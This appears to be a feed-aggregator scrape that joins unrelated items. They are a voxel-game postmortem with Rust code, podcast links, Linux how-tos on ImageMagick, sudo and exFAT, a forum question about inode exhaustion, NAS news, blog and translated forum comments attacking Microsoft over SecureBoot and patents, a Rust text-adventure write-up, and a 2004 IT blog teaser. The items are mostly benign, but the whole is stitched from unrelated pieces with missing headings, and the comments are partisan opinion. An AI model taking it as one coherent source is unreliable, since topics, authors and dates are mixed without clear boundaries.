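        self.blocks[x as usize][y as usize][z as usize]
    }

    // Faces whose neighbor is empty are the only visible ones.
    fn visible_faces(&self) -> usize {
        const DIRS: [(i32, i32, i32); 6] =
            [(1, 0, 0), (-1, 0, 0), (0, 1, 0), (0, -1, 0), (0, 0, 1), (0, 0, -1)];
        let mut faces = 0;
        for x in 0..N as i32 {
            for y in 0..N as i32 {
                for z in 0..N as i32 {
                    if !self.solid(x, y, z) { continue; }
                    for (dx, dy, dz) in DIRS {
                        if !self.solid(x + dx, y + dy, z + dz) {
                            faces += 1; // exposed face: emit 2 triangles
                        }
                    }
                }
            }
        }
        faces
    }
}

fn main() {
    // A completely full chunk: only the 6 outer surfaces remain visible,
    // 16*16 faces each, instead of 16^3 * 6 faces for naive cube drawing.
    let chunk = Chunk { blocks: [[[true; N]; N]; N] };
    println!("{}", chunk.visible_faces()); // 1536 = 6 * 16 * 16
}
```

For a full 16³ chunk this drops the face count from 24,576 to 1,536, which is why the transformation pays off at large view distances.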

Another technical difficulty with a world based on cubes was making it look nice instead of blocky. Some algorithms that used a kind of filter were investigated. As the view distance is limited, there can be a conflict when the player is underground.

The game engine can't know whether the far distance, which is not visible, should be replaced by a light background (from the sky) or a dark background (typical when underground). A compromise is used, where the color of the distance fog depends on whether the player is above or below a certain height.


There are strict requirements on the protocol. If a server shall be able to handle 10,000+ players, the communication can easily become a bottleneck. TCP/IP was selected in favor of UDP/IP to make traffic control easier to handle. The protocol itself is not based on any standard and is completely customized for Ephenation.


There are two major choices: either use a scripting language to control aspects of the world, or take a graphical approach. A scripting language is more powerful, but on the other hand it is harder to learn. There is also the problem of supporting a massive number of players, in which case time-consuming scripts would make it unfeasible.

The choice was to go for a limited set of blocks, with a special block type that can be used to initiate predefined actions. Inspiration was taken from the principles of Lego blocks. With a relatively small set of basic blocks, it is possible to construct the most amazing things.


Game engine

The client side was designed from scratch instead of using an existing game engine. This may have been a mistake, as most of the development time was spent on graphics technology instead of exploring the basic visions.

Adventure design and mechanics

The set of blocks and the possible actions with "activator blocks" are currently limited. They are not enough to construct full adventures that are fun to explore and provide great entertainment.
Early version of the game, where a player abused the monster spawner

Game play

The basic world is automatically generated. This usually makes for a game of limited interest, as game play is bound to become repetitive. Support from initial players enabled the creation of a world with many new buildings and creations. The more advanced features that support dynamic behavior were not added until later, which unfortunately led to most of the current world being too static.


The graphics are working, but far from production level. There are several glitches, e.g. the camera falling inside walls and lighting effects being cut off. As the world is dynamic, the possibilities for offline precalculation are limited. That means most graphical effects have to be done live, which is a difficult requirement. For example, it is not known how many light sources it should be possible to manage. A deferred shader was chosen, which improves the decoupling of geometry and shading.
Early attempt to create automatic monsters. This was later replaced with fully animated models.


The social side of the game play has been explored only to a very limited extent. There are ways to send messages to nearby players, and to communicate privately with any player. Although this is a very important aspect of the final vision, it is known technology and not difficult to implement.

Performance tests

The aggressive requirement to support 10,000 simultaneous players is hard to verify. A simple simulator was used, adding 1,000 players at random positions with a uniform density. These players simply walked around. If they were attacked, they attacked back. If they were killed, they automatically used the command to revive.

On a Core i7 with 8 GB of RAM, the load from the server was approximately 10%. This is no proof that the server can actually manage 10,000 players, as there may be non-linear dependencies. There are known bottlenecks, for example monster management, which is currently handled by a single thread. That means at most one core can be used for it, but it should be possible to distribute this task across several smaller goroutines.

The communication was measured at around 100 MB/s. With linear scaling, that would be 1 GB/s for 10,000 players. The intention is that the scaling should be linear, as cross-communication between players is designed to be of constant volume. Still, this remains to be proven.

There is the obvious question of whether the simulator is representative of real players. One way to improve that assessment would be to measure the actual behaviour of real players and compare it with the simulator.

Another possible bottleneck is the communication with the player database (MongoDB). This depends on the number of logins/logouts and auto-saves. It also depends on the load generated by the web page. This has not been evaluated. Typically, an access takes about 1 ms. MongoDB is currently located on the same system as the game server, minimizing communication latency. The database will have to be managed by another computer system for a full production server.


The objects that the player can wear and wield are simplified. As the game concept is unlimited, it is not possible to hand-craft objects. Instead, there are 4 defined qualities for each object, per level.


TCP/IP has a higher overhead than UDP/IP. Some packets are big (complete chunks), which would have required several UDP/IP packets and complicated transmission control. It may be that UDP/IP should be used instead. However, this was not an issue for the evaluation of the project.

As the server is responsible for all object attributes, the clients need to be updated frequently. Player and monster positions are updated 10 times per second. This generates a fair amount of data, so updates are limited to nearby players. Because of this, the client needs to interpolate positions to show smooth movements, and it needs to be able to manage stale information about other players and monsters. The advantage of having the server manage all attributes is that it is not possible to cheat: the client source code is available, and it would have been easy to make changes.
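The interpolation between 10 Hz server snapshots can be sketched as follows (a Rust sketch with hypothetical names; the actual client is C++):

```rust
// Illustrative sketch: draw an entity between two server snapshots by
// linear interpolation; clamp so stale data holds the last known position.

#[derive(Clone, Copy, Debug, PartialEq)]
struct Vec3 { x: f32, y: f32, z: f32 }

fn lerp(a: Vec3, b: Vec3, t: f32) -> Vec3 {
    let t = t.clamp(0.0, 1.0); // t > 1 means the next update is overdue
    Vec3 {
        x: a.x + (b.x - a.x) * t,
        y: a.y + (b.y - a.y) * t,
        z: a.z + (b.z - a.z) * t,
    }
}

/// Position to draw at time `now`, given the two latest server snapshots
/// (`prev_time`/`next_time` are their timestamps, 0.1 s apart at 10 Hz).
fn interpolated(prev: Vec3, next: Vec3, prev_time: f64, next_time: f64, now: f64) -> Vec3 {
    let t = ((now - prev_time) / (next_time - prev_time)) as f32;
    lerp(prev, next, t)
}

fn main() {
    let a = Vec3 { x: 0.0, y: 0.0, z: 0.0 };
    let b = Vec3 { x: 1.0, y: 2.0, z: 0.0 };
    // Render frame halfway between two updates that are 0.1 s apart:
    let p = interpolated(a, b, 0.0, 0.1, 0.05);
    println!("{:?}", p); // x = 0.5, y = 1.0
}
```

A production client would typically extrapolate or smooth rather than freeze when updates stall, but clamping shows the stale-data handling in its simplest form.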


Moore's law

I believe computers will continue to grow exponentially more powerful for many years yet. However, the full power will probably not be accessible unless the game server can scale well with an increasing number of cores. The performance tests were done on hardware from 2011, and much more powerful equipment is already available.

Adventure design

As a proof of concept, I think the project was successful. The thing I miss most is a powerful enough mechanism to support custom adventures. This is a key point of the game concept, but I believe that, with more personnel involved, new ideas would emerge that would improve the possibilities considerably.

Document update history

2013-02-22 First published.
2013-02-24 Added discussion about using voxels on the client side.
2013-02-27 Information about entity attribute management and communication.
2015-05-04 Pictures failed, and were replaced.

          Links from Open Source Musician Podcast 53        
Here are some links from Open Source Musician Podcast episode 53:

harrisonconsoles.com - Mixbus

Harrison Mixbus: The $79 Virtual Analog Console, Now on Both Mac and Linux

Sonic Talk Podcast


WalkThrough/Dev/JackSession - Jack Audio Connection Kit - Trac

ardour - the digital audio workstation

Ardour 3.0 alpha 4 released

Paul Davis

Mixxx - Free Digital DJ Software

DSSI - API for audio processing plugins

Leigh Dyer: woo, tangent | lsd's rants about games, music, linux, and technology


PiTiVi, a free and open source video editor for Linux

Open Source Musician Podcast: Podcast editing using Ardour

Saffire PRO 40 Audio Interface

ffado.org - Free Firewire Audio Drivers

Diffusion (acoustics) - Wikipedia


Podcast OUT.
          Convert multiple JPG, PNG, or GIF image files into a single PDF file easily with ImageMagick on OS X, Linux, or Cygwin        
I found a simple approach: ImageMagick can do it.
Apple: convert JPG and PNG to PDF with ImageMagick on OS X
ImageMagick also works on other Unix systems, and even on Cygwin.
Read more »
          Linux: change user with sudo root privileges and run commands without a password        
Every time we want to run a system command as a sudoer, we have to enter a password. But after some googling, I found a way to run system commands without a password.
Read more »
          Install and Use exfat USB under Ubuntu        
Ubuntu exFAT

exFAT (Extended File Allocation Table) is a Microsoft file system optimized for flash drives. exFAT can be used where the NTFS file system is not a feasible solution (due to data structure overhead), or where the file size limit of the standard FAT32 file system is unacceptable.

exFAT has been adopted by the SD Card Association as the default file system for SDXC cards larger than 32 GB.

Native Linux support for exFAT is still limited. As of 2010, a working implementation under FUSE exists, which reached version 1.0 in 2013. So we need to install exfat-fuse and related packages in Ubuntu in order to use exFAT.

Install exfat package under Ubuntu

Update all repositories.
jose@jose-ubuntu:~$ sudo apt-get update

Install the two packages below.
jose@jose-ubuntu:~$ sudo apt-get install exfat-fuse exfat-utils

Use exFAT USB under Ubuntu

If Ubuntu doesn't auto-mount your exFAT-formatted drive, you can mount the exFAT USB manually after installing the above 2 packages.
jose@jose-ubuntu:~$ sudo mkdir /media/xxx
jose@jose-ubuntu:~$ sudo mount -t exfat /dev/sdxx /media/xxx

/media/xxx - the mount-point folder for the exFAT partition.
/dev/sdxx - your exFAT partition.
  1. How to enable exFAT in Ubuntu 14.04

          out of inodes        

Hi everyone,

This is my first post so a bit of background first - skip if you want


I've built a web-based coding dojo server which supports about 10 different languages.


It's free, with no adverts and no login; instead it asks for donations to raise money to buy Raspberry Pi computers for schools. It's backed by TurnKey Rails. TurnKey is awesome. It's early days compared to what I'd like to do, but I've more or less cobbled stuff together and it seems to work, and I'm starting to get some £ in and have already given a few Pis to local schools.


I'm pretty green at Linux, admin, etc. I've hit a problem: I'm running out of inodes. For example (after reclaiming some disk space on /dev/sda1, where I'm running out):

#df -i



Filesystem            Inodes   IUsed   IFree IUse% Mounted on
/dev/sda1             655360  555214  100146   85% /
none                  170404    2018  168386    2% /dev
none                  188955       1  188954    1% /dev/shm
none                  188955      32  188923    1% /var/run
none                  188955       3  188952    1% /var/lock
none                  188955       1  188954    1% /lib/init/rw
/dev/sda2            19546112      90 19546022    1% /mnt

So I was hoping I could "move" some of the space on /dev/sda2 to /dev/sda1

I've done a bit of searching and found this


which looks promising. However, ssh'ing onto my cyber-dojo server and running 



both report nothing. They don't say command not found. They just report nothing. Is this route an option for me? If so how do I do it?


It turns out that cyber-dojo gobbles up inodes in one particular sub-folder. I was wondering whether a simple ln to point that sub-folder to /mnt, so that it lives on /dev/sda2, might be a simpler solution? Would that work?


Also, when I go to


and I click the web-management and web-shell icons on the top right, they both say
"This page is not available." How do I get them working?





          Grml 2014.11 shipped on DVD of german Linux User magazine 02/2015        
          Grml 2014.03 shipped on DVD of german Linux User magazine 06/2014        
          Grml 2014.03 shipped on german magazine LinuxWelt 05/14        
          Grml 2014.03 shipped on DELUG-DVD of german Linux Magazine 06/2014        
          Thecus Launches Thecus Connect Live Information Tool        

Thecus has launched a great new feature and app called Thecus Connect, which is compatible with all of Thecus' Linux-based NAS devices. The new Thecus Connect is a remote WiFi connection app that allows users to gain live access to their NAS unit, enabling them to monitor the most up-to-date information and notifications directly on their mobile […]

The post Thecus Launches Thecus Connect Live Information Tool appeared first on eTeknix.

          Orbweb.me Now Also Supported on All Thecus Linux NAS’        

It has been a little over half a year since Thecus introduced support for Orbweb.me on their WSS-based NAS'. That was so successful that support has now been extended to all of Thecus' Linux-based NAS' too. Whether you run the older Thecus OS 5.0 or the recently released Thecus OS 7.0, you can […]

The post Orbweb.me Now Also Supported on All Thecus Linux NAS’ appeared first on eTeknix.

          Comment on 10 Best Linux Gaming Websites That Every Linux Gamer Should Follow by post-pc        
Linux games video, 2017: https://www.youtube.com/watch?v=-yMS3ybBLYo
          Comment on How TO Dual Boot Cub Linux On Windows 10, Chromixium OS by adil        
Why are WiFi speeds slow on Linux distros? Is Cub Linux any different?
          Comment on How To Run Your Favorite Android Apps On Linux Operating System by Mochamad Fajar Sodik        
I don't see this in my Google Chrome? Why?
          Comment on How To Run Your Favorite Android Apps On Linux Operating System by Mochamad Fajar Sodik        
"Now extract each and every APK file that you have stored on your PC" - what does that mean? I don't know what I should do. Please help.
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by Raj Singh        
Thanx a lot :)
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by penultimateName        
I never meant to suggest you thought Windows is crap. Apologies if I gave that impression. There are many people that believe it is crap. I didn't get that impression from you. Well balanced criticism is welcome.
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by Raj Singh        
Everything has two aspects, sir: one good and one bad. I didn't say Windows is just crap. I just mentioned some points which show that Linux is one step ahead of Windows. By the way, I completely agree with your point as well. :)
          Comment on Top 5 Reasons Why You Should Choose Linux Over Windows 10 by penultimateName        
Not so fast. I do agree there is a level of truth to all of the points. However, vulnerabilities were recently discovered that had been open for a decade. The software is free, but sometimes you get what you pay for. In any case, many apps in the Windows store are free, and there is a very good chance Windows will continue to be free. For businesses, maintenance is not free. There is no magic bullet. Linux has its place, as does Windows. Anyone who claims either one is the perfect solution is smoking the good stuff. I do have extensive experience with Linux at work.
          Linux / Amazon Web Services Systems Administrator        
NY-White Plains, Top Prospect Group is searching for a Linux / Amazon Web Services Systems Administrator for our national client based in Westchester County NY. This role is a direct hire role. As always, we are speaking directly to the hiring manager. Outstanding benefits and working environment. Gym in building! Call today Responsibilities: • Provide ongoing administration and support for Linux (CentOS) systems
          Linux hosts found as unknown or windows        

I found that the problem was the virtual machine I was using for the scan, I installed Spiceworks on my pc and the scan works well.

Thank you, Andrew, for your help.

          Linux hosts found as unknown or windows        

Already done, about 3 times, without success. The only solution is to make an entry for every "unknown" Linux server.

          Linux hosts found as unknown or windows        

Try rescanning the device

          Linux hosts found as unknown or windows        

Thanks, I had already set the correct SSH login, but it works for some servers and not for others; I am very confused.

Now I have double-checked and tested the root/password pair, and I can't see why the problem is still there.

          Linux hosts found as unknown or windows        

I would take a guess that, not having the power of Greyskull, you have not added or enabled SSH on your scan range?

http://community.spiceworks.com/help/My_SSH_Account_Doesn%27t_Seem_To_Work_Right should help you get started

          Linux hosts found as unknown or windows        

Hi everyone, I have a big problem: I have been testing Spiceworks for a few weeks, but I keep getting many Linux servers scanned as Windows, with wrong authentication.

My question is: is there a way to solve the situation without creating an entry for every server?

Thanks in advance

This topic first appeared in the Spiceworks Community
          Can't open book PDFs by clicking PDF or Path        
Calibre 2.85.1, Linux, openSUSE 42.3. Usually I open a document by clicking the "PDF" or "Path" link in the details panel on the right. This does not work and results in an error: File or directory not found: Fehler beim Holen der Informationen für Datei »/home/zzz_servers/thot03/x_database/calibre/Marion%20Wendland/Kommunikation%20-%20Seminar%20(3586)«: Datei oder Verzeichnis nicht gefunden ("Error getting information for file: file or directory not found"). However, copying the underlying link into Firefox or the file browser does the job... Have you forgotten the " ... " for the path? Has anybody experienced similar behavior? I am grateful for tips! Thanks
          RE[7]: Hate'em or love'em...        
My, aren't you smug. It was stated that the Mini does not have an equivalent in the PC world, but it does: the Shuttle X100. While not the same price, it has equivalent features, and the hardware is probably identical aside from the softROM that Apple uses instead of a hard BIOS. Having to run OS X wasn't part of the statement; it was form factor versus form factor. So it won't run OS X, big deal. To be accurate, it won't run Aqua; the core of OS X, Darwin, can be downloaded and run on x86 hardware. I'd suggest to anyone that they just buy commodity hardware and run Linux, FreeBSD, Solaris, or Darwin on it if they want a Unix, since it would serve them better in the long run than using OS X. The only thing that was attractive about Apple hardware was the PowerPC architecture. Now that that is gone, I don't have a reason to look at Apples anymore. By the way, I'm posting this from my PowerBook G4 running OS X 10.4. There are some cool programs that run on OS X, so I'll probably keep it around for now. I'm less married to an OS than I am to either what it runs on or what I can do with it.
          A Rusty Venture: Writing a text adventure in Rust        

After a couple of months of playing around with Rust, I've finished a project! It's a simple text adventure game called Adventure!, in the vein of the classic text adventure Zork. The feature set isn't as wide as Zork's; there is no combat, and movement & world interaction are pretty simple. I was never really into text adventures myself, but I thought that it would make an interesting & fun first project with Rust.


I wanted to write a game consisting of a few rooms, with a few things to do in each room. The feature set wouldn't go past picking up objects, adding them to an inventory, and using inventory objects with static objects in the world. I didn't want to involve combat with NPCs, as I didn't want to work on this project long-term; it's a toy project for learning a bit about how Rust works.

Changing Rooms

My first design involved having Room structs that would contain a member connection: Connection. This Connection struct would itself have 4 members: north, south, east and west. The value of these members was to be an Option<Box<Room>>. The main Game object that ran the whole show would have a current_room reference that points to whatever instance of Room the user was in.

Unfortunately, this design gave me trouble with the borrow checker. I got many cannot move out of borrowed context errors thrown at me. At the time, I didn't really fully understand how the borrow checker works - and honestly, I'm pretty sure I still don't understand it fully. I decided to take a simpler approach: I'd store current_room as an integer representing an index into the vector of rooms. In Rust, the index of a vector is of type usize, a pointer-sized (therefore system-dependent) unsigned int. At first, I stored current_room as an i32, but this led to lots of as usize casting all over the place. Connection objects would be Option<usize>, and changing rooms would be as simple as replacing current_room with another usize value.

The downside of this approach is having to know each Room's index in the vector ahead of time. I kept track of the room numbers while designing the game 'map', so it wasn't a big deal in my particular situation. I thought being able to 'point' to other Rooms directly with references would be simpler, but that would bring its own problems. For example, it would create circular references (eg: Room 1 is connected to Room 2, but if we create Room 1 first, how do we define this relationship when creating the Room object? My solution: you wouldn't; you'd connect the rooms afterwards).
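A stripped-down sketch of that index-based design (hypothetical names, not the game's actual types) shows the connect-afterwards trick:

```rust
// Sketch of the index-based room design: connections are Option<usize>
// indices into the game's Vec<Room>, not references, so the borrow checker
// stays happy and rooms can be wired up after they are all created.

struct Room {
    name: String,
    north: Option<usize>, // index into Game::rooms
    south: Option<usize>,
}

struct Game {
    rooms: Vec<Room>,
    current_room: usize, // an index, not a borrowed &Room
}

impl Game {
    fn go_north(&mut self) -> bool {
        // Copy the Option<usize> out first so no borrow of `rooms` is held
        // while we mutate `current_room`.
        let north = self.rooms[self.current_room].north;
        if let Some(idx) = north {
            self.current_room = idx;
            true
        } else {
            false
        }
    }
}

fn main() {
    // Create all the rooms first, then connect them afterwards by index.
    let mut rooms = vec![
        Room { name: "garden".to_string(), north: None, south: None },
        Room { name: "greenhouse".to_string(), north: None, south: None },
    ];
    rooms[0].north = Some(1);
    rooms[1].south = Some(0);

    let mut game = Game { rooms, current_room: 0 };
    game.go_north();
    println!("{}", game.rooms[game.current_room].name); // greenhouse
}
```

Because the connections are plain numbers, the "circular reference" problem disappears: both rooms exist before either connection is written.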

Flags & Actions

My next set of problems came with dealing with state changes in the game. I ended up declaring a HashMap<&'static str, bool> in a struct Flags at the top level of the game that gets passed around to the different functions. Originally, each Room was going to have its own set of flags, but I didn't want to have to reach across rooms to check the state of something - especially if an action in one room can have consequences elsewhere.

Dealing with the actions took the longest to figure out. I had an important question I needed to answer at this point: how can I define each Item or Room to have different behaviour depending on the state of global flags? To solve this, I used closures. For instance, here is how an Item is defined:

struct Item {
    name: String,
    is_grabbable: bool,
    on_grab: Box<Fn(&mut Flags)>,
    on_use: Box<Fn(&mut Flags, String, usize) -> bool>,
}

Both on_grab and on_use accept closures. Because our state is stored in a global object, each room doesn't really need to worry about what's going on in other rooms - it only needs to know the state of the world through the Flags object it receives. This allows me to use closures to define certain behaviour.

I’m not exactly sure if this method is idiomatic Rust. I’ve been writing primarily JavaScript for my day job for the past few years so I’m still in that state of mind where functions are first class citizens that I should be taking advtange of. I wasn’t really sure how else to define individual behaviour for separate instances of the same type.1

For instance, this is an example of how an Item is defined:

Item {
    name: "shovel".to_string(),
    is_grabbable: true,
    on_grab: Box::new(|flags: &mut Flags| {
        println!("The shovel looks as if it has never been used before; the layer of dust that falls off as you pick it up shows that it has been sitting on that table for a long time. You slip the shovel in your pocket.");
        flags.update_key("pickedUpShovel", true);
    }),
    on_use: Box::new(|flags: &mut Flags, object_name: String, current_room: usize| -> bool {
        // this sucks; checking if we are in the room before performing the action
        if current_room == 1 && object_name == "glass door" {
            if flags.get_key("smashedDoor") == Some(&false) {
                println!("It takes a few swings before a couple of cracks appear in the glass. Wondering why such strong glass is needed for a greenhouse door, you continue to swing away until a loud crash and gust of fresh air announces the success of your swinging endeavours.");
                flags.update_key("smashedDoor", true);
            } else {
                println!("You seem to have already done a number on that poor door - maybe you should leave it alone?");
            }
            true
        } else {
            println!("You aren't sure how to use the shovel with the {}", object_name);
            false
        }
    }),
}
… and that’s just one item! Imagine a whole Room, with its own behaviour and items! (Or see for yourself and check out the source file with the levels defined.)

Another issue is that this method leads to cases where certain objects that don’t use a specific callback have empty closures, which makes rustc complain about unused variables. This isn’t a huge deal, but it can clutter up compiler messages which is slightly annoying.

Originally, I planned on serializing each room into data files instead of hard coding them into Rust source code. This way, anyone can write their own text adventure without knowing a line of Rust! As soon as I decided to use closures, however, that task seemed like it would be much more difficult. How do you serialize behaviour? The only method I can think of is via a scripting language, and that was way out of scope for this project.

Other random notes

  • It would be nice if there was a way to initialize a HashMap by passing a series of key/values to its new() function or via a literal. I’m using a macro I found on StackOverflow to do the job right now but it would be neat if this was built into the standard library.
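The macro in question boils down to something like this (a sketch of the common StackOverflow pattern, not necessarily the exact macro I used):

```rust
use std::collections::HashMap;

// A HashMap "literal" macro: expands each `key => value` pair into an
// insert() call on a freshly created map.
macro_rules! hashmap {
    ( $( $key:expr => $val:expr ),* $(,)? ) => {{
        let mut m = HashMap::new();
        $( m.insert($key, $val); )*
        m
    }};
}

fn main() {
    let flags: HashMap<&'static str, bool> = hashmap! {
        "pickedUpShovel" => false,
        "smashedDoor" => false,
    };
    println!("{}", flags.len()); // 2
}
```

The `$(,)?` at the end simply allows an optional trailing comma, so the literal can be formatted like a normal struct initializer.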

Conclusion: I like it.

In the process of writing this post, I’ve had to question a few of my design choices and actually learned new stuff (the idea of changing the type of current_room from i32 to usize happened due to this post)!

The likelihood of me continuing to work on this project is low. However, if I were to make an 'Adventure! 2.0', I'd make the following changes:

  • Spice things up with Termion. I came across this great blog post by the author of the termion crate, ticki. Maybe making some item names show up in Zelda’s “Important Noun” red, or having more of a persistent GUI on screen, such as the inventory.
  • Take advantage of more core Rust/Cargo tools, like rustdoc.
  • Tests! Testing is important. I worked on this project for a few hours a week over the span of a month so it wasn’t something at the top of my mind.
  • Figure out cross-compilation so I can build executables for Windows & macOS from my Linux desktop

I had fun working on Adventure. If you’d like to check it out, here is the GitHub repo. I’d like to figure out cross-compilation soon to get some binaries up on the GitHub page. My next project will involve gasp graphics! Until then…

  1. As I write this, a few ideas come to mind (although I’m not sure if they actually work). Perhaps creating a trait that all Rooms/Items implement, and write a macro that creates a new struct with said trait with the individual behaviour defined within? Just a thought. 

          24.03.2013 19:44:24 ximaera        
I don't know what MS was hoping to achieve with SCO, but it has patent claims of its own against Linux. en.wikipedia.org/wiki/Software_patents_and_free_software#Infringement_claims
          24.03.2013 14:09:51 Deeman        
SecureBoot is a trap for potential antitrust investigations. Formally, Microsoft's rules allow you to disable SecureBoot and install Linux or any other OS without a check for a key, a key that must otherwise be obtained, through a humiliating process, from Microsoft itself.

In reality, they implemented this scheme in an extremely cunning way, having anticipated how buyers behave:
1) Microsoft is a monopolist in the PC market. It dictates which technologies get built into motherboards, because 96% of buyers will install its operating system, and any manufacturer that wants to stay afloat has to comply.
2) Most of their buyers are not technically literate enough to go into the UEFI settings and disable SecureBoot.
3) As a result, these people will never get to try a free alternative in the form of friendly distributions like Ubuntu, and will remain enslaved to Microsoft forever.

If you think I'm exaggerating, look for yourself: has anything like this happened before? Even once? I know the story of ACPI, which was designed to work with Windows and to put a moderately heavy spoke in Linux's wheels. In the end support was implemented anyway, despite a severe shortage of documentation.

But this is a different story: at the very lowest system level, Microsoft has usurped the right to dictate what is allowed to boot and what is not. The idea that HP and Intel acted on their own in developing UEFI seems silly, since it was Microsoft's software they intended to run on that hardware!

So: I see no excusable motive for this move. In my view, MS is rotten to the core as a company, driven by nothing but profit, and don't tell me that's every corporation's main goal: here they are quite literally forbidding the use of alternative products, and that is not remotely normal. And here is a thought about the future:

The world is moving toward mobile devices. Android tablets are the only ones whose ranks include models with an open bootloader, while devices from BlackBerry and Apple, and everything certified for Windows 8, will not let you boot a single OS from the outside world. That is the lock-in of the decade and, in my view, technological censorship. Mobile Ubuntu will only be installable on Android tablets; the rest won't even let you try to boot it. This sinister trend simply has to be stopped, or we will end up in a new feudal age where big corporations fleece their customers simply by denying them the right to choose.

There are fewer and fewer savvy users these days, because the media companies have set a hard course for dumbing people down. Take Apple users, for whom "everything just works" and who would "rather pay a little money than figure things out". Ideal consumers. But where will the new creators come from?
          24.03.2013 13:50:54 Nothingman        
You seem to have a complex about this. And what about Google being the first to announce that it would not support its software for Windows Phone? More than that, it forced a large share of users off gmail (you can find the thread here), and then it cut off Windows Phone's access to Maps. All of that was justified by WP's small user base, yet Microsoft still supports Skype for Linux, even though in percentage terms the gap is comparable to, or even bigger than, Android's lead over WP.
          24.03.2013 12:50:28 Deeman        
The link you left is pure PR. Blaring PR.
Nokia published files for making your own phone cases on a 3D printer. Now think about it: only a tiny fraction of their phones' buyers own a 3D printer, and you could never set up production of your own phones based on these files, because Nokia would immediately start screaming about "patents!!" and "infringement of the Lumia line's design rights!!11"

In short, this is a move aimed at building a bright image of the company in the eyes of techies; in reality it is empty and says nothing about where the company is actually headed. Nothing at all.

Incidentally, Microsoft has also been doing open-source PR lately, and even on Habr I run into comments seriously claiming that MS has become an empire of good. Guys, what is wrong with you? Dig a little and you will see right away that every MS open-source project is in one way or another aimed at supporting or advertising its own products; even Mono was developed without MS's involvement (unless you count the development of .NET itself). What they have actually done is build SecureBoot, run a Mikhalkov-style raid on every Android manufacturer demanding outrageous royalties (as a reminder, at the moment only Sony pays no royalties for Android, and many manufacturers pay more than a WindowsPhone license would cost), and buy Skype to use as an instrument of blackmail or for dragging buyers onto their own platform (much like Google buying YouTube and now herding everyone into G+). It all looks a lot like a dog in the manger. They started shipping lousy products, collecting money for patents that the Linux kernel allegedly infringes, patents whose contents they have disclosed to no one (!), and decided not to let any promising technology develop except by way of MS technologies.

Microsoft is a greedy and frequently dishonest corporation, and it has been one from the very beginning.
          24.03.2013 12:04:21 Zigmar        
When Nokia trolls the iPhone, and Microsoft and Apple troll the Android handset makers, it all smells bad, but you can understand them to some extent: these are areas where they compete directly, and they are trying, if not to squeeze competitors out of the market (as in Apple's case), then at least to bite off a piece of someone else's profit (Microsoft, Nokia). This lawsuit, though, is beyond good and evil, something out of the SCO vs Linux school, or the tactics of professional patent trolls like Intellectual Ventures. Just dump on someone and rake in the cash, without the slightest concern for saving face. Today my opinion of Nokia dropped below the floorboards.
          [urls] Web Services Differentiation with Service Level Agreements        
Wednesday, September 1, 2004
Dateline: China
The following is a sampling of my top ten "urls" for the past couple/few weeks.  By signing up with Furl (it's free), anyone can subscribe to an e-mail feed of ALL my urls (about 100-250 per week) -- AND limit by subject (e.g., ITO) and/or rating (e.g., articles rated "Very Good" or "Excellent").  It's also possible to receive new urls as an RSS feed.  However, if you'd like to receive a daily feed of my urls but do NOT want to sign up with Furl, I can manually add your name to my daily Furl distribution list.  (And if you want off, I'll promptly remove your e-mail address.)
Top Honors:
* Web Services Differentiation with Service Level Agreements, courtesy of IBM T.J. Watson; as the title suggests, this paper tackles SLAs.  See also Web Services QoS: External SLAs and Internal Policies, by the same author.  The latter paper was the invited keynote at the 1st Web Services Quality Workshop (this site provides links to abstracts for all the workshop papers as well as links to each author's personal site).
Other best new selections (in no particular order):
* Product Focused Software Process Improvement: PROFES 2004 (if you're going to read only one tech book this year, let it be this!!)
* Legacy systems strike back!!  We all know that there is a good market in servicing legacy systems.  See the following: Arriba: Architectural Resources for the Restructuring and Integration of Business Application (an introduction), Identifying Problems in Legacy Software, and Evolution of Legacy Systems.  
* Online Communities in Business: Past Progress, Future Directions, Five Keys To Building Business Relationships Online and Advantages of Using Social Software for Building Your Network.  (I can say with a fairly high level of confidence that these tools can be used to expand your business network.  Been there, done that.  Give it a try.  Do I already know you and would you like an invitation to join LinkedIn?  If the answer to both questions is "yes," let me know ...)
* Carnegie Mellon Project Aura Video (gets a bit silly at times, but the language translation component was interesting to see; the R-T example is still years away, but the idea is intriguing and this is where collaboration tools need to go)
* Innovation: Strategy for Small Fish (from the Harvard Business School; however, NVIDIA would not have been my choice for a case study)
* Stata Labs: Managing at a Distance, for Less (a pretty good case study; I firmly believe that China's systems integrators/contract developers need world-class collaboration tools and this describes one of the formats I support)
* An Authoring Technology for Multidevice Web Applications (one of my favorite topics -- and an area where I believe SIs in China can take the lead)
* Cheapware (or, "Changsha Gone Wild!!"; hey Qilu clan, are you listening?  Go, Ding, go!!)
* How To Team With A Vendor (a "must read" -- and evidently a lot of my readers already did, even though I only made a passing reference in a previous posting)
Examples of urls that didn't make my "Top Ten List":
> ITU Internet Reports 2004: The Portable Internet (looks like this might be a great series; less biased than the typical IT advisory services report -- and a much better value, too)
> Software Cost Reduction (courtesy of the <U.S.> Naval Research Lab, this paper is a bit dated, but still worth reading; addresses problems with large-scale systems, albeit a bit light on practical examples) 
> Japan IT Outsourcing 2004-2008 Forecast: IDC (might be a worthwhile purchase, especially for the Dalian-based systems integrators)
> The Power of No (Linux as a bargaining tool <see my Furl comments, too>; make Microsoft shake in their boots!!)
> Web Design Practices (a good reference site)
and many, many more ...
David Scott Lewis
President & Principal Analyst
IT E-Strategies, Inc.
Menlo Park, CA & Qingdao, China
http://www.itestrategies.com (current blog postings optimized for MSIE6.x)
http://tinyurl.com/2r3pa (access to blog content archives in China)
http://tinyurl.com/2azkh (current blog postings for viewing in other browsers and for access to blog content archives in the US & ROW)
http://tinyurl.com/2hg2e (AvantGo channel)
To automatically subscribe click on http://tinyurl.com/388yf .

          [news] "2004 State of Application Development"        
Friday, August 13, 2004
Dateline: China
Special issues of journals and magazines are often quite good -- if you're into the subject matter.  But the current issue of VARBusiness is absolutely SUPERB!!  EVERY SYSTEMS INTEGRATOR SHOULD READ IT ASAP -- STOP WHAT YOU'RE DOING AND READ THIS ISSUE!!  (Or, at the very least, read the excerpts which follow.)  See http://tinyurl.com/6smzu .  They even have the survey results to 36 questions ranging from change in project scope to preferred verticals.  In this posting, I'm going to comment on excerpts from this issue.  My comments are in blue.  Bolded excerpted items are MY emphasis.
